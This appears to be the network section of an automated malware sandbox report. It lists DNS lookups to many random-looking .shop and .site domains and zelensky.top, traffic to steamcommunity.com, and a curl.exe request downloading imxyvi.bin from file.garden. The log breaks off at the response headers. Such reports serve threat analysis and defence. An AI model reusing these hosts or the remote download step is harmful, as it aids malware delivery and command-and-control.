                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.252278090 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.513663054 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.513684034 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.514050007 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.518726110 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.518749952 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.519036055 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.990278006 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.990377903 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:25.990653038 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.004371881 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.004399061 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.004412889 CEST49728443192.168.2.10104.21.1.169
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.004421949 CEST44349728104.21.1.169192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.356164932 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.356225967 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.356328011 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.357289076 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.357305050 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.996531010 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.996601105 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.015208960 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.015232086 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.015539885 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.017213106 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.063401937 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522783995 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522806883 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522824049 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522852898 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522882938 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.522911072 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.523041964 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.623433113 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.623457909 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.623758078 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.623783112 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.624310017 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628747940 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628822088 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628829956 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628854036 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628880024 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.628976107 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.629789114 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.629806995 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.629842043 CEST49732443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.629848003 CEST44349732104.102.49.254192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.664043903 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.664155006 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.664258957 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.664539099 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:27.664571047 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.121468067 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.121702909 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.128922939 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.128974915 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.129281998 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.130603075 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.130700111 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.130747080 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.638307095 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.638405085 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.638463974 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.642021894 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.642049074 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.642060995 CEST49733443192.168.2.10172.67.197.40
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:28.642066956 CEST44349733172.67.197.40192.168.2.10
                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.909548044 CEST5879253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.919317961 CEST53587921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.577439070 CEST6200553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.587315083 CEST53620051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.717881918 CEST6518453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.730690956 CEST53651841.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.779439926 CEST4978953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.791752100 CEST53497891.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.795526981 CEST5104453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.882416010 CEST53510441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.889039993 CEST6240253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.898658991 CEST53624021.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.933938026 CEST5129153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.946209908 CEST53512911.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.496229887 CEST5859953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.508163929 CEST53585991.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.525474072 CEST6365253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.535638094 CEST53636521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.581168890 CEST4952053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.590591908 CEST53495201.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.652822971 CEST5942853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.661875010 CEST53594281.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:19.302640915 CEST6515053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:19.318198919 CEST53651501.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:23.388037920 CEST5394053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:23.402647018 CEST53539401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.590801001 CEST5339953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.618031979 CEST53533991.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.708420992 CEST5452653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.718199015 CEST53545261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.742022038 CEST5550653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.751950979 CEST53555061.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.760160923 CEST6076053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.779009104 CEST53607601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.074348927 CEST6335453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.084053040 CEST53633541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.132198095 CEST5028253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.141530991 CEST53502821.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.194394112 CEST5950153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.204060078 CEST53595011.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.321582079 CEST5977753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.332817078 CEST53597771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.334974051 CEST5843653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.345108986 CEST53584361.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:56.128375053 CEST5983653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:56.483170033 CEST53598361.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:00.354989052 CEST6189253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:00.454200983 CEST53618921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:06.777870893 CEST5916253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:07.120635033 CEST53591621.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:11.511609077 CEST5546753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:11.520112991 CEST53554671.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:18.524677038 CEST6185153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:18.614612103 CEST53618511.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:45.815359116 CEST5409253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:45.904159069 CEST53540921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:56.017527103 CEST5847553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:56.107593060 CEST53584751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:06.255696058 CEST4997653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:06.345465899 CEST53499761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:46.838383913 CEST4969453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:46.931672096 CEST53496941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:23:36.074611902 CEST5311253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:23:36.412744999 CEST53531121.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:24:03.722990036 CEST5903853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:24:03.818559885 CEST53590381.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.909548044 CEST192.168.2.101.1.1.10xdb6cStandard query (0)file.gardenA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.577439070 CEST192.168.2.101.1.1.10xd3ceStandard query (0)tiddymarktwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.717881918 CEST192.168.2.101.1.1.10x69d7Standard query (0)surveriysiop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.779439926 CEST192.168.2.101.1.1.10x36dfStandard query (0)captainynfanw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.795526981 CEST192.168.2.101.1.1.10xf08dStandard query (0)tearrybyiwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.889039993 CEST192.168.2.101.1.1.10xe217Standard query (0)appleboltelwk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.933938026 CEST192.168.2.101.1.1.10x93bdStandard query (0)tendencerangej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.496229887 CEST192.168.2.101.1.1.10x4476Standard query (0)fossillargeiw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.525474072 CEST192.168.2.101.1.1.10x43aStandard query (0)coursedonnyre.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.581168890 CEST192.168.2.101.1.1.10x3b13Standard query (0)strappystyio.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.652822971 CEST192.168.2.101.1.1.10x6dcaStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:19.302640915 CEST192.168.2.101.1.1.10xc6f2Standard query (0)offeviablwke.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:23.388037920 CEST192.168.2.101.1.1.10x57fdStandard query (0)explorationmsn.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.590801001 CEST192.168.2.101.1.1.10xc7deStandard query (0)famikyjdiag.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.708420992 CEST192.168.2.101.1.1.10x7fd7Standard query (0)possiwreeste.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.742022038 CEST192.168.2.101.1.1.10x47eeStandard query (0)commandejorsk.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.760160923 CEST192.168.2.101.1.1.10x884eStandard query (0)underlinemdsj.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.074348927 CEST192.168.2.101.1.1.10x32c5Standard query (0)bellykmrebk.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.132198095 CEST192.168.2.101.1.1.10x1d61Standard query (0)agentyanlark.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.194394112 CEST192.168.2.101.1.1.10x8202Standard query (0)writekdmsnu.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.321582079 CEST192.168.2.101.1.1.10x94b9Standard query (0)delaylacedmn.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.334974051 CEST192.168.2.101.1.1.10x887cStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:56.128375053 CEST192.168.2.101.1.1.10x7649Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:00.354989052 CEST192.168.2.101.1.1.10x3788Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:06.777870893 CEST192.168.2.101.1.1.10x9fcStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:11.511609077 CEST192.168.2.101.1.1.10xb3d2Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:18.524677038 CEST192.168.2.101.1.1.10x7854Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:45.815359116 CEST192.168.2.101.1.1.10x44b3Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:56.017527103 CEST192.168.2.101.1.1.10x8a60Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:06.255696058 CEST192.168.2.101.1.1.10x334eStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:46.838383913 CEST192.168.2.101.1.1.10x34f2Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:23:36.074611902 CEST192.168.2.101.1.1.10xe53cStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:24:03.722990036 CEST192.168.2.101.1.1.10x53e1Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.919317961 CEST1.1.1.1192.168.2.100xdb6cNo error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.919317961 CEST1.1.1.1192.168.2.100xdb6cNo error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.587315083 CEST1.1.1.1192.168.2.100xd3ceName error (3)tiddymarktwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.730690956 CEST1.1.1.1192.168.2.100x69d7Name error (3)surveriysiop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.791752100 CEST1.1.1.1192.168.2.100x36dfName error (3)captainynfanw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.882416010 CEST1.1.1.1192.168.2.100xf08dName error (3)tearrybyiwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.898658991 CEST1.1.1.1192.168.2.100xe217Name error (3)appleboltelwk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:16.946209908 CEST1.1.1.1192.168.2.100x93bdName error (3)tendencerangej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.508163929 CEST1.1.1.1192.168.2.100x4476Name error (3)fossillargeiw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.535638094 CEST1.1.1.1192.168.2.100x43aName error (3)coursedonnyre.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.590591908 CEST1.1.1.1192.168.2.100x3b13Name error (3)strappystyio.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:17.661875010 CEST1.1.1.1192.168.2.100x6dcaNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:19.318198919 CEST1.1.1.1192.168.2.100xc6f2No error (0)offeviablwke.site172.67.197.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:19.318198919 CEST1.1.1.1192.168.2.100xc6f2No error (0)offeviablwke.site104.21.84.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:23.402647018 CEST1.1.1.1192.168.2.100x57fdNo error (0)explorationmsn.store188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:23.402647018 CEST1.1.1.1192.168.2.100x57fdNo error (0)explorationmsn.store188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.618031979 CEST1.1.1.1192.168.2.100xc7deName error (3)famikyjdiag.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.718199015 CEST1.1.1.1192.168.2.100x7fd7Name error (3)possiwreeste.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.751950979 CEST1.1.1.1192.168.2.100x47eeName error (3)commandejorsk.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.779009104 CEST1.1.1.1192.168.2.100x884eNo error (0)underlinemdsj.site104.21.1.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:24.779009104 CEST1.1.1.1192.168.2.100x884eNo error (0)underlinemdsj.site172.67.129.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.084053040 CEST1.1.1.1192.168.2.100x32c5Name error (3)bellykmrebk.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.141530991 CEST1.1.1.1192.168.2.100x1d61Name error (3)agentyanlark.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.204060078 CEST1.1.1.1192.168.2.100x8202Name error (3)writekdmsnu.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.332817078 CEST1.1.1.1192.168.2.100x94b9Name error (3)delaylacedmn.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.345108986 CEST1.1.1.1192.168.2.100x887cNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:56.483170033 CEST1.1.1.1192.168.2.100x7649Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:00.454200983 CEST1.1.1.1192.168.2.100x3788Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:07.120635033 CEST1.1.1.1192.168.2.100x9fcName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:11.520112991 CEST1.1.1.1192.168.2.100xb3d2Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:18.614612103 CEST1.1.1.1192.168.2.100x7854Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:45.904159069 CEST1.1.1.1192.168.2.100x44b3Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:21:56.107593060 CEST1.1.1.1192.168.2.100x8a60Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:06.345465899 CEST1.1.1.1192.168.2.100x334eName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:22:46.931672096 CEST1.1.1.1192.168.2.100x34f2Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:23:36.412744999 CEST1.1.1.1192.168.2.100xe53cName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:24:03.818559885 CEST1.1.1.1192.168.2.100x53e1Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    • file.garden
                                                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                                                    • offeviablwke.site
                                                                                                                                                                                                                                                                                    • explorationmsn.store
                                                                                                                                                                                                                                                                                    • underlinemdsj.site
                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.1049708188.114.97.34438048C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC104OUTGET /ZmE_ziOgiFXI9Y48/1/imxyvi.bin HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
